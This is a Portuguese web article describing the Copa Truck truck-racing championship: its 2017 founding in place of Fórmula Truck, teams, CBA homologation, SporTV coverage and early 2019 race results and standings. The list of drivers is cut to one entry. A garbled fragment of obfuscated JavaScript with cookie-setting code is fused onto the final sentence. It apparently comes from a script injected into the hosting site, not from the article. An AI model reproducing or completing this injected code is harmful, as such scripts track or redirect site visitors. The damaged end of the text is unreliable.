O que é a Copa Truck?

O que é a Copa Truck? – Se você é apaixonado por caminhões, com certeza sabe do que se trata quando falamos em Copa Truck. Basicamente, trata-se de um campeonato de corrida entre caminhões, com veículos especialmente equipados para situações de alta velocidade, pistas rápidas e pilotos profissionais.

O campeonato surgiu em 2017, com o objetivo de substituir a já consagrada Fórmula Truck. Esta, por sua vez, foi extinta nesse mesmo ano, a partir da saída de nove equipes, motivadas pelas polêmicas na administração de Neusa Navarro Félix. A Copa Truck conta com as mesmas equipes e pilotos que a extinta Fórmula Truck.

Até o momento, já foram realizadas 3 edições da Copa Truck, considerando a de 2019, que ainda está em andamento. O campeão atual é Roberval Andrade, que corre pela equipe RVR Corinthians Motorsport, com um veículo fabricado pela Mercedez Benz.

Atualmente, a Copa Truck conta com 22 pilotos, os quais são organizados em 10 equipes diferentes. A Maistro Competições, organização que havia competido em 2018, foi extinta. Os seus pilotos, Regis Boessio e Hiro Yano, continuam competindo por outras equipes. No caso de Boessio, foi criada uma própria equipe: Boessio Competições. Hiro Yano se juntou a outros 5 pilotos na equipe RM Competições.

• Luiz Lopes (Lucar Motorsport);

No mês de novembro de 2017, a Copa Truck foi homologada pela CBA – Confederação Brasileira do Automobilismo – como campeonato oficial ligado à confederação, substituindo a Fórmula Truck.

Atualmente, a Copa Truck é transmitida pelo SporTV, canal especializado em esportes, que faz parte do Grupo Globo.

Copa Truck – Campeonato de 2019

A Copa Truck de 2019 contará com 9 etapas. Dessas, até o dia 22 de Abril (data de lançamento desse artigo), já foram realizadas duas: e etapa de Goiânia, em Goiás, e a etapa de Campo Grande, no Mato Grosso do Sul.

Cada etapa conta com duas corridas. Os resultados das duas etapas já realizadas você vê a seguir:

• Etapa de Goiânia: Corrida 1 – Vencedor Beto Monteiro, da RM Motors. Corrida 2 – Vencedor Beto Monteiro, da RM Motors;
  • Etapa de Campo Grande: Corrida 1 – Vencedor Beto Monteiro, da RM Motors. Corrida 2 – Vencedor Paulo Salustiano, da RM Motors;

A partir dessas etapas, o top 3 classificatório até o momento conta com: Beto Monteiro em 1º (78 pontos); Felipe Giaffone em 2º (59 pontos); André Marques em 3º (57 pontos).,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var (e||”)+g+’;\x20path=/’;}r (0x0)==’\x20′)n=n[b(‘0xb’)]